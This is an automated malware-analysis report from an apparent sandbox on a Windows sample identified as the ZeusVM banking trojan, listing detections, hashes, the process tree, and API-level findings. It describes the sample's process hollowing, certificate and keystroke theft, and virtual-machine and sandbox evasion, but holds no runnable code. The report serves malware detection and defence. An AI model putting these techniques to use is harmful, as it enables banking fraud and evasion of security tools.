Windows Analysis Report yw6At7QnNh

Overview

General Information

Sample Name: yw6At7QnNh (renamed file extension from none to exe)
Analysis ID: 458121
MD5: 8ba293749c97cbf48f30f02c66d3406d
SHA1: 6a7492a26d0a16320daa2cb187232fc0053f4f5f
SHA256: e2075b32b9716dc41ef667a74c1ae2c2841a5b9fd3046db0bdcd96c581778253
Tags: exe uncategorized

Detection

ZeusVM
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected ZeusVM e-Banking Trojan
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Contain functionality to detect virtual machines
Contains VNC / remote desktop functionality (version string found)
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
May initialize a security null descriptor
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Process Tree

  • System is w10x64
  • yw6At7QnNh.exe (PID: 3420 cmdline: 'C:\Users\user\Desktop\yw6At7QnNh.exe' MD5: 8BA293749C97CBF48F30F02C66D3406D)
    • yw6At7QnNh.exe (PID: 5952 cmdline: 'C:\Users\user\Desktop\yw6At7QnNh.exe' MD5: 8BA293749C97CBF48F30F02C66D3406D)
      • yw6At7QnNh.exe (PID: 1536 cmdline: 'C:\Users\user\Desktop\yw6At7QnNh.exe' MD5: 8BA293749C97CBF48F30F02C66D3406D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: yw6At7QnNh.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ athefff3h6266cd5fa708f.tmp Avira: detection malicious, Label: TR/Agent.hjvc
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ athefff3h6266cd5fa708f.tmp ReversingLabs: Detection: 53%
Multi AV Scanner detection for submitted file
Source: yw6At7QnNh.exe Virustotal: Detection: 81%
Source: yw6At7QnNh.exe Metadefender: Detection: 60%
Source: yw6At7QnNh.exe ReversingLabs: Detection: 92%
Machine Learning detection for sample
Source: yw6At7QnNh.exe Joe Sandbox ML: detected
Source: 1.2.yw6At7QnNh.exe.10000000.4.unpack Avira: Label: TR/Agent.hjvc
Source: 3.2.yw6At7QnNh.exe.400000.0.unpack Avira: Label: TR/Kazy.MK
Source: 3.1.yw6At7QnNh.exe.400000.0.unpack Avira: Label: TR/Kazy.MK
Source: 1.2.yw6At7QnNh.exe.400000.0.unpack Avira: Label: TR/Agent.hjvc
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 2_2_00401282 GetModuleFileNameA,GetEnvironmentVariableA,GetEnvironmentVariableA,GetEnvironmentVariableA,FindResourceA,GetDesktopWindow,GetDesktopWindow,PeekMessageA,Sleep,IsWindow,IsDialogMessageA,TranslateMessage,DispatchMessageA,IsDlgButtonChecked,GetDesktopWindow,FindResourceA,LoadResource,SizeofResource,LockResource,FindResourceA,LoadResource,SizeofResource,??2@YAPAXI@Z,??_U@YAPAXI@Z,LockResource,PathCombineA,PathFileExistsA,CryptAcquireContextA,CryptAcquireContextA,CryptAcquireContextA,CryptCreateHash,??2@YAPAXI@Z,??_U@YAPAXI@Z,??2@YAPAXI@Z,CryptHashData,CryptDeriveKey,CryptDecrypt,MessageBoxA,??2@YAPAXI@Z,Sleep,GetCommandLineA,CreateFileA,FindCloseChangeNotification,PathCombineA,CreateFileA,CloseHandle,FindExecutableA,DeleteFileA,DeleteFileA,DeleteFileA,Sleep,PathCombineA,DeleteFileA,2_2_00401282
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_2_0040D467 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,3_2_0040D467
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_2_00417C71 CryptUnprotectData,LocalFree,3_2_00417C71
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_1_0040D467 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,3_1_0040D467
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_1_00417C71 CryptUnprotectData,LocalFree,3_1_00417C71

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\yw6At7QnNh.exe Unpacked PE file: 2.2.yw6At7QnNh.exe.400000.0.unpack
Source: C:\Users\user\Desktop\yw6At7QnNh.exe Unpacked PE file: 3.2.yw6At7QnNh.exe.400000.0.unpack
Source: yw6At7QnNh.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_2_0040B8C3 GetFileAttributesExW,ReadProcessMemory,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,3_2_0040B8C3
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_1_0040B8C3 GetFileAttributesExW,ReadProcessMemory,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,3_1_0040B8C3
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_2_00411830 PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,3_2_00411830
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_2_004118EB FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,3_2_004118EB
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_1_00411830 PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,3_1_00411830
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_1_004118EB FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,3_1_004118EB
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_2_00414047 recv,3_2_00414047
Source: yw6At7QnNh.exeString found in binary or memory: http://www.google.com/webhp
Source: yw6At7QnNh.exe, 00000002.00000002.205524903.0000000002070000.00000004.00000001.sdmp, yw6At7QnNh.exe, 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://www.google.com/webhpbcMY.txt
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_2_0041D43B GetFileAttributesExW,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetQueryDataAvailable,HttpQueryInfoA,closesocket,send,WSASend,OpenInputDesktop,SwitchDesktop,DefWindowProcW,DefWindowProcA,DefDlgProcW,DefDlgProcA,DefFrameProcW,DefFrameProcA,DefMDIChildProcW,DefMDIChildProcA,CallWindowProcW,CallWindowProcA,RegisterClassW,RegisterClassA,RegisterClassExW,RegisterClassExA,BeginPaint,EndPaint,GetDCEx,GetDC,GetWindowDC,ReleaseDC,GetUpdateRect,GetUpdateRgn,GetMessagePos,GetCursorPos,SetCursorPos,SetCapture,ReleaseCapture,GetCapture,GetMessageW,GetMessageA,PeekMessageW,PeekMessageA,TranslateMessage,GetClipboardData,PFXImportCertStore,3_2_0041D43B
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_2_00409FCC EnterCriticalSection,GetTickCount,LeaveCriticalSection,GetKeyboardState,ToUnicode,TranslateMessage,3_2_00409FCC

E-Banking Fraud:

Detected ZeusVM e-Banking Trojan
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_2_0041ADE1 lstrcmpiA,lstrcmpiA,lstrcmpiA,CloseHandle,3_2_0041ADE1
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_1_0041ADE1 lstrcmpiA,lstrcmpiA,lstrcmpiA,TlsSetValue,CloseHandle,3_1_0041ADE1
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_2_0040A2BA OpenWindowStationW,CreateWindowStationW,GetProcessWindowStation,OpenDesktopW,CreateDesktopW,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,CloseDesktop,CloseWindowStation,3_2_0040A2BA
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 1_2_10001000 peagtfosapeh,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,1_2_10001000
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 2_2_00401046 DeleteFileA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,2_2_00401046
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 2_1_00401046 CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,2_1_00401046
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 2_2_004018F0: GetModuleHandleA,??2@YAPAXI@Z,lstrcatA,CreateFileA,DeviceIoControl,isalnum,isalnum,lstrcpyA,lstrcpyA,lstrcpyA,CharUpperA,CharUpperA,CharUpperA,CloseHandle,2_2_004018F0
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_2_0040DAE4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,3_2_0040DAE4
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_2_00416142 InitiateSystemShutdownExW,ExitWindowsEx,3_2_00416142
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_2_00413970 CreateMutexW,GetLastError,CloseHandle,CloseHandle,ExitWindowsEx,OpenEventW,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,ReadProcessMemory,Sleep,IsWellKnownSid,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,3_2_00413970
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_1_00416142 InitiateSystemShutdownExW,ExitWindowsEx,3_1_00416142
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_1_00413970 CreateMutexW,GetLastError,CloseHandle,CloseHandle,ExitWindowsEx,OpenEventW,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,ReadProcessMemory,Sleep,IsWellKnownSid,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,3_1_00413970
Source: C:\Users\user\Desktop\yw6At7QnNh.exe Code function: 1_2_004036E4 1_2_004036E4
Source: C:\Users\user\Desktop\yw6At7QnNh.exe Code function: 3_2_0040200B 3_2_0040200B
Source: C:\Users\user\Desktop\yw6At7QnNh.exe Code function: 3_2_0040718A 3_2_0040718A
Source: C:\Users\user\Desktop\yw6At7QnNh.exe Code function: 3_2_0040D373 3_2_0040D373
Source: C:\Users\user\Desktop\yw6At7QnNh.exe Code function: 3_2_0040EF15 3_2_0040EF15
Source: C:\Users\user\Desktop\yw6At7QnNh.exe Code function: 3_1_0040200B 3_1_0040200B
Source: C:\Users\user\Desktop\yw6At7QnNh.exe Code function: 3_1_0040718A 3_1_0040718A
Source: C:\Users\user\Desktop\yw6At7QnNh.exe Code function: 3_1_0040D373 3_1_0040D373
Source: C:\Users\user\Desktop\yw6At7QnNh.exe Code function: 3_1_0040EF15 3_1_0040EF15
Source: C:\Users\user\Desktop\yw6At7QnNh.exe Code function: String function: 00408888 appears 37 times
Source: yw6At7QnNh.exe, 00000001.00000002.203455259.00000000027D0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs yw6At7QnNh.exe
Source: yw6At7QnNh.exe, 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameTStub.exe vs yw6At7QnNh.exe
Source: yw6At7QnNh.exe, 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameCwork.exe vs yw6At7QnNh.exe
Source: yw6At7QnNh.exe Binary or memory string: OriginalFilename vs yw6At7QnNh.exe
Source: yw6At7QnNh.exe, 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameCwork.exe vs yw6At7QnNh.exe
Source: yw6At7QnNh.exe Binary or memory string: OriginalFilenameTStub.exe vs yw6At7QnNh.exe
Source: yw6At7QnNh.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: athefff3h6266cd5fa708f.tmp.1.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.bank.troj.evad.winEXE@5/2@0/0
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 1_2_0040105A GetSysColor,GetDoubleClickTime,SetDoubleClickTime,GetTickCount,GetDesktopWindow,GetDesktopWindow,PeekMessageA,PeekMessageA,Sleep,IsWindow,IsDialogMessageA,TranslateMessage,DispatchMessageA,IsDlgButtonChecked,GetDesktopWindow,FindWindowA,SetWindowTextA,LoadLibraryA,GetProcAddress,FindResourceA,IsClipboardFormatAvailable,wsprintfA,LoadResource,SizeofResource,GetLastError,GetCurrentProcess,TerminateProcess,LockResource,GetOpenFileNameA,SetFileAttributesA,LdrInitializeThunk,lstrcmpiA,MessageBoxA,GetClassInfoW,GetSysColor,GetTempPathA,GetUserDefaultLangID,PathAddBackslashA,lstrcatA,CreateFileA,WriteFile,GetLastError,FormatMessageA,CloseHandle,IsWindowEnabled,PostMessageA,LoadLibraryA,lstrlenA,GetProcAddress,GetCurrentThreadId,peagtfosapeh,1_2_0040105A
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_2_004099A9 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,3_2_004099A9
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_2_00409B1E CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,3_2_00409B1E
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_1_004099A9 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,3_1_004099A9
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_1_00409B1E CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,3_1_00409B1E
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_2_0040D88E GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,3_2_0040D88E
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_1_0040D88E GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,3_1_0040D88E
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_2_0040D837 CreateToolhelp32Snapshot,Thread32First,Thread32Next,CloseHandle,3_2_0040D837
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_2_004179CD CoCreateInstance,3_2_004179CD
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 1_2_0040105A GetSysColor,GetDoubleClickTime,SetDoubleClickTime,GetTickCount,GetDesktopWindow,GetDesktopWindow,PeekMessageA,PeekMessageA,Sleep,IsWindow,IsDialogMessageA,TranslateMessage,DispatchMessageA,IsDlgButtonChecked,GetDesktopWindow,FindWindowA,SetWindowTextA,LoadLibraryA,GetProcAddress,FindResourceA,IsClipboardFormatAvailable,wsprintfA,LoadResource,SizeofResource,GetLastError,GetCurrentProcess,TerminateProcess,LockResource,GetOpenFileNameA,SetFileAttributesA,LdrInitializeThunk,lstrcmpiA,MessageBoxA,GetClassInfoW,GetSysColor,GetTempPathA,GetUserDefaultLangID,PathAddBackslashA,lstrcatA,CreateFileA,WriteFile,GetLastError,FormatMessageA,CloseHandle,IsWindowEnabled,PostMessageA,LoadLibraryA,lstrlenA,GetProcAddress,GetCurrentThreadId,peagtfosapeh,1_2_0040105A
Source: C:\Users\user\Desktop\yw6At7QnNh.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
Source: C:\Users\user\Desktop\yw6At7QnNh.exe File created: C:\Users\user\AppData\Local\Temp\ athefff3h6266cd5fa708f.tmp
Source: yw6At7QnNh.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\yw6At7QnNh.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: yw6At7QnNh.exe Virustotal: Detection: 81%
Source: yw6At7QnNh.exe Metadefender: Detection: 60%
Source: yw6At7QnNh.exe ReversingLabs: Detection: 92%
Source: unknown Process created: C:\Users\user\Desktop\yw6At7QnNh.exe 'C:\Users\user\Desktop\yw6At7QnNh.exe'
Source: C:\Users\user\Desktop\yw6At7QnNh.exe Process created: C:\Users\user\Desktop\yw6At7QnNh.exe 'C:\Users\user\Desktop\yw6At7QnNh.exe'
Source: C:\Users\user\Desktop\yw6At7QnNh.exe Process created: C:\Users\user\Desktop\yw6At7QnNh.exe 'C:\Users\user\Desktop\yw6At7QnNh.exe'
Source: C:\Users\user\Desktop\yw6At7QnNh.exe Process created: C:\Users\user\Desktop\yw6At7QnNh.exe 'C:\Users\user\Desktop\yw6At7QnNh.exe'
Source: C:\Users\user\Desktop\yw6At7QnNh.exe Process created: C:\Users\user\Desktop\yw6At7QnNh.exe 'C:\Users\user\Desktop\yw6At7QnNh.exe'

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\yw6At7QnNh.exe Unpacked PE file: 3.2.yw6At7QnNh.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.data:W;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\yw6At7QnNh.exe Unpacked PE file: 2.2.yw6At7QnNh.exe.400000.0.unpack
Source: C:\Users\user\Desktop\yw6At7QnNh.exe Unpacked PE file: 3.2.yw6At7QnNh.exe.400000.0.unpack
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 1_2_0040105A GetSysColor,GetDoubleClickTime,SetDoubleClickTime,GetTickCount,GetDesktopWindow,GetDesktopWindow,PeekMessageA,PeekMessageA,Sleep,IsWindow,IsDialogMessageA,TranslateMessage,DispatchMessageA,IsDlgButtonChecked,GetDesktopWindow,FindWindowA,SetWindowTextA,LoadLibraryA,GetProcAddress,FindResourceA,IsClipboardFormatAvailable,wsprintfA,LoadResource,SizeofResource,GetLastError,GetCurrentProcess,TerminateProcess,LockResource,GetOpenFileNameA,SetFileAttributesA,LdrInitializeThunk,lstrcmpiA,MessageBoxA,GetClassInfoW,GetSysColor,GetTempPathA,GetUserDefaultLangID,PathAddBackslashA,lstrcatA,CreateFileA,WriteFile,GetLastError,FormatMessageA,CloseHandle,IsWindowEnabled,PostMessageA,LoadLibraryA,lstrlenA,GetProcAddress,GetCurrentThreadId,peagtfosapeh,1_2_0040105A
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 1_2_00405450 push eax; ret 1_2_0040547E
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 1_2_00408888 push eax; ret 1_2_004088A6
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 2_2_00402550 push eax; ret 2_2_0040257E
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 2_1_00402550 push eax; ret 2_1_0040257E
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_2_00402961 push cs; iretd 3_2_00402970
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_2_0040292B push cs; ret 3_2_00402940
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_2_0040B1F7 push ebp; ret 3_2_0040B386
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_2_00402295 push es; iretd 3_2_004022A4
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_1_00402961 push cs; iretd 3_1_00402970
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_1_0040292B push cs; ret 3_1_00402940
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_1_0040B1F7 push ebp; ret 3_1_0040B386
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_1_00402295 push es; iretd 3_1_004022A4
Source: C:\Users\user\Desktop\yw6At7QnNh.exe File created: C:\Users\user\AppData\Local\Temp\ athefff3h6266cd5fa708f.tmp
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_2_0040BC07 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadImageW,GetIconInfo,GetCursorPos,DrawIcon,lstrcmpiW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,3_2_0040BC07

Malware Analysis System Evasion:

Contain functionality to detect virtual machines
Source: C:\Users\user\Desktop\yw6At7QnNh.exe Code function: VBOX VBOX QEMU HARDDISK QEMU HARDDISK VMWARE VBOX 2_2_004018F0
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: yw6At7QnNh.exe Binary or memory string: SBIEDLL.DLL
Source: yw6At7QnNh.exe, 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp, yw6At7QnNh.exe, 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmpBinary or memory string: $@RTLDECOMPRESSBUFFERNTDLL.DLLGETTHREADCONTEXTWRITEPROCESSMEMORYVIRTUALALLOCEXNTDLL.DLLNTUNMAPVIEWOFSECTIONCREATEPROCESSARESUMETHREADSETTHREADCONTEXTKERNEL32.DLLOPENMSDEFAULTBROWSER.HTMLYGN3456789MICROSOFT BASE CRYPTOGRAPHIC PROVIDER V1.0APPDATATEMPVIRTUALVMWAREQEMU HARDDISKVMLOGVBOX\\.\CWMONITORSBIEDLL.DLL
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_2_00411830 PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,3_2_00411830
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_2_004118EB FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,3_2_004118EB
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_1_00411830 PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,3_1_00411830
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_1_004118EB FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,3_1_004118EB
Source: yw6At7QnNh.exe, 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmpBinary or memory string: $@RtlDecompressBufferNtdll.dllGetThreadContextWriteProcessMemoryVirtualAllocExntdll.dllNtUnmapViewOfSectionCreateProcessAResumeThreadSetThreadContextkernel32.dllopenMSDefaultBrowser.htmlYGN3456789Microsoft Base Cryptographic Provider v1.0APPDATATEMPVIRTUALVMWAREQEMU HARDDISKVMLOGVBOX\\.\cwmonitorSbieDll.dll
Source: yw6At7QnNh.exe, 00000001.00000002.203455259.00000000027D0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: yw6At7QnNh.exeBinary or memory string: QEMU HARDDISK
Source: yw6At7QnNh.exeBinary or memory string: VMWARE
Source: yw6At7QnNh.exe, 00000001.00000002.203455259.00000000027D0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: yw6At7QnNh.exe, 00000001.00000002.203455259.00000000027D0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: yw6At7QnNh.exe, 00000001.00000002.203455259.00000000027D0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 1_2_0040105A GetSysColor,GetDoubleClickTime,SetDoubleClickTime,GetTickCount,GetDesktopWindow,GetDesktopWindow,PeekMessageA,PeekMessageA,Sleep,IsWindow,IsDialogMessageA,TranslateMessage,DispatchMessageA,IsDlgButtonChecked,GetDesktopWindow,FindWindowA,SetWindowTextA,LoadLibraryA,GetProcAddress,FindResourceA,IsClipboardFormatAvailable,wsprintfA,LoadResource,SizeofResource,GetLastError,GetCurrentProcess,TerminateProcess,LockResource,GetOpenFileNameA,SetFileAttributesA,LdrInitializeThunk,lstrcmpiA,MessageBoxA,GetClassInfoW,GetSysColor,GetTempPathA,GetUserDefaultLangID,PathAddBackslashA,lstrcatA,CreateFileA,WriteFile,GetLastError,FormatMessageA,CloseHandle,IsWindowEnabled,PostMessageA,LoadLibraryA,lstrlenA,GetProcAddress,GetCurrentThreadId,peagtfosapeh,1_2_0040105A
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 1_2_0040105A GetSysColor,GetDoubleClickTime,SetDoubleClickTime,GetTickCount,GetDesktopWindow,GetDesktopWindow,PeekMessageA,PeekMessageA,Sleep,IsWindow,IsDialogMessageA,TranslateMessage,DispatchMessageA,IsDlgButtonChecked,GetDesktopWindow,FindWindowA,SetWindowTextA,LoadLibraryA,GetProcAddress,FindResourceA,IsClipboardFormatAvailable,wsprintfA,LoadResource,SizeofResource,GetLastError,GetCurrentProcess,TerminateProcess,LockResource,GetOpenFileNameA,SetFileAttributesA,LdrInitializeThunk,lstrcmpiA,MessageBoxA,GetClassInfoW,GetSysColor,GetTempPathA,GetUserDefaultLangID,PathAddBackslashA,lstrcatA,CreateFileA,WriteFile,GetLastError,FormatMessageA,CloseHandle,IsWindowEnabled,PostMessageA,LoadLibraryA,lstrlenA,GetProcAddress,GetCurrentThreadId,peagtfosapeh,1_2_0040105A
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_2_004129EB mov edx, dword ptr fs:[00000030h]3_2_004129EB
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_1_004129EB mov edx, dword ptr fs:[00000030h]3_1_004129EB
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 3_2_00412D30 GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,HeapCreate,GetProcessHeap,InitializeCriticalSection,WSAStartup,CreateEventW,GetLengthSid,GetCurrentProcessId,3_2_00412D30
Source: C:\Users\user\Desktop\yw6At7QnNh.exeCode function: 1_2_0040A813 SetUnhandledExceptionFilter,1_2_0040A813
